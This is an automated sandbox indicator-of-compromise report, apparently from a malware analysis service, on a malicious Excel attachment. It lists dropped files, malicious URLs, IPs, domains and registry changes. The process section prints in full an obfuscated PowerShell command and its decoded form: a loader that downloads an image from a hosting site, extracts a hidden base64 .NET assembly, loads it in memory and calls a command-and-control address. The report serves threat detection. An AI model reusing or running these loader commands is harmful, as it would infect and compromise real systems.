IOC Report
#20240627_Edlen_A.xls

loading gif

Files

File Path
Type
Category
Malicious
#20240627_Edlen_A.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun May 26 18:29:10 2024, Security: 1
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc
ISO-8859 text, with very long lines (1707), with CRLF, CR, LF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc
ISO-8859 text, with very long lines (1707), with CRLF, CR, LF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nXPJ.url
MS Windows 95 Internet shortcut text (URL=<http://z2.ink/nXPJ>), ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\z2.ink.url
MS Windows 95 Internet shortcut text (URL=<http://z2.ink/>), ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\rugtucw
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Bo3r4[1].txt
ASCII text, with very long lines (11472), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lionarekingofjungleimageshere[1].bmp
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C434091.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61AE6F44.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BF22ED0.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2D2A1F64-27D8-4507-A763-F5114DB22C88}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F791DA79-78F1-4AE5-808F-463F6AF8FA08}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\1ws4m3m4.xs5.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\2kro4ew5.lct.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\BC5.tmp
SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
dropped
C:\Users\user\AppData\Local\Temp\F8D.tmp
SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
dropped
C:\Users\user\AppData\Local\Temp\FF56.tmp
SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\mfe1q2ow.ix3.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\tmn44ujy.e4g.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\{2178790F-B770-41BF-8744-4B796E955306}
data
dropped
C:\Users\user\AppData\Local\Temp\{B33A6DEA-0735-487B-B176-36E55809ABF7}
data
dropped
C:\Users\user\AppData\Local\Temp\~DF2D116EC66936C416.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFBC2F112CC991C446.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFF92B5CC893CED70F.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [xls]
modified
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\sfwjhij
data
dropped
C:\Users\user\Desktop\#20240627_Edlen_A.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 17:35:43 2024, Security: 1
dropped
C:\Users\user\Desktop\26330000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 17:35:43 2024, Security: 1
dropped
C:\Users\user\Desktop\26330000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 26 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRwBCDgTreFIDgTreLwDgTrewDgTreDgDgTreMDgTreDgTre4DgTreC8DgTreNgDgTre1DgTreDEDgTreLgDgTre3DgTreDcDgTreMQDgTreuDgTreDYDgTreNDgTreDgTreuDgTreDgDgTreOQDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
 malicious
C:\Users\user\AppData\Roaming\rugtucw
C:\Users\user\AppData\Roaming\rugtucw
 malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
 malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
 malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
 malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
 malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
 malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
 malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
 malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
 malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
 malicious
C:\Windows\System32\taskeng.exe
taskeng.exe {2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
There are 9 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://198.46.177.156/8080/lionarekingofjungleimageshere.bmp
198.46.177.156
 malicious
http://198.46.177.156/8080/RBG.txt
198.46.177.156
 malicious
http://prolinice.ga/index.php
77.232.129.190
 malicious
http://vilendar.ga/index.php
malicious
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
188.114.97.3
 malicious
https://paste.ee/d/Bo3r4
188.114.96.3
 malicious
http://prolinice.ga/
unknown
 malicious
https://uploaddeimagens.com.br
unknown
 malicious
http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc
198.46.177.156
 malicious
https://duckduckgo.com/chrome_newtab
unknown
http://prolinice.ga/ndex.php
unknown
https://duckduckgo.com/ac/?q=
unknown
http://ocsp.entrust.net03
unknown
https://contoso.com/License
unknown
http://crl.use
unknown
https://paste.ee/n
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://analytics.paste.ee
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://paste.ee/e
unknown
https://www.google.com
unknown
http://aikpfjvjuwcsxfjs.net/application/x-www-form-urlencodedMozilla/5.0
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://aikpfjvjuwcsxfjs.net/
unknown
http://www.autoitscript.com/autoit3
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://ocsp.entrust.net0D
unknown
http://z2.ink/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
http://prolinice.ga/index.php.
unknown
http://www.piriform.com/ccleanerxe
unknown
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
unknown
https://paste.ee/d/Bo3r4gj
unknown
https://www.google.com/favicon.ico
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://java.sun.com
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
unknown
https://analytics.paste.ee;
unknown
http://www.piriform.com/ccleaner
unknown
http://198.46.177.156/8080/lionarekingofjungleimageshere.bmpj
unknown
https://support.mozilla.org
unknown
http://prolinice.ga/index.phpMozilla/5.0
unknown
https://secure.comodo.com/CPS0
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://themes.googleusercontent.com
unknown
http://crl.entrust.net/2048ca.crl0
unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
There are 47 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.96.3
 malicious
z2.ink
54.241.153.192
 malicious
uploaddeimagens.com.br
188.114.97.3
 malicious
prolinice.ga
77.232.129.190
 malicious

IPs

IP
Domain
Country
Malicious
54.241.153.192
z2.ink
United States
malicious
77.232.129.190
prolinice.ga
Russian Federation
malicious
188.114.97.3
uploaddeimagens.com.br
European Union
malicious
188.114.96.3
paste.ee
European Union
malicious
198.46.177.156
unknown
United States
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
%e(
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\26873
26873
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
%j(
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
